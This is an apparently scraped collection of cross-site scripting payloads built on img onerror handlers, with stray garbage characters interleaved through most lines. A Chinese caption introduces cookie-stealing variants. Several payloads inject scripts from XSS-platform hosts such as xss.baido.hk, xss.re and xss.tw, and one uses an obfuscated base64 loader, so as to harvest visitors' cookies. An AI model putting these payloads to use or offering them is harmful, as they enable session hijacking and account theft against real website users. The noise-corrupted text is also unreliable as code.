<img src='non-exist.jpg'onerror="alert('xss')">
) E2 R; G9 O# \8 @<img src=# onerror=alert(123)>/ q- v$ {* ?: P7 w) u7 @
<img src=# onerror=alert(document.cookie)> r A& S" n$ @1 x
下面是利用平台钓cookie的
. k# \- {: m4 l) n <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>! |! f* J5 ?% S8 v/ n5 e6 n
! o1 [. \1 K! R; s4 N9 z1 q D6 A/ z I' b
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>, W. O9 U* N1 X. ]
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
5 o& Z! ]' _' {7 B# C: y“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
* u% F& l1 Z* M9 O9 A l$ I$ Z1 A<img src=1 onerror=jQuery.getScript("//xss.re/974")>
2 o; N' E7 C1 J8 w! y<img src="#">
3 s7 m! W9 M: R( w6 m8 t<img src="#">! r7 V$ b$ ~( [" Q$ a" p' {
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
& `- ]8 x. z' b$ G9 Y<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
9 w& k8 B5 C9 d0 l<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
2 b: m; J# ]! E3 R+ X( ~5 A4 s3 t' o( u<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
* Y; m0 a% W" l" o' [0 g<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
1 n1 X$ k1 n! |3 P H1 b5 `+ s3 \- S$ R<img src=x width="0" height="0"></img>/ h: q- Q. r) l8 w$ `, m
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))> a# y5 k( W1 G8 M
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>1 X. I+ T# G# c; t D; H
|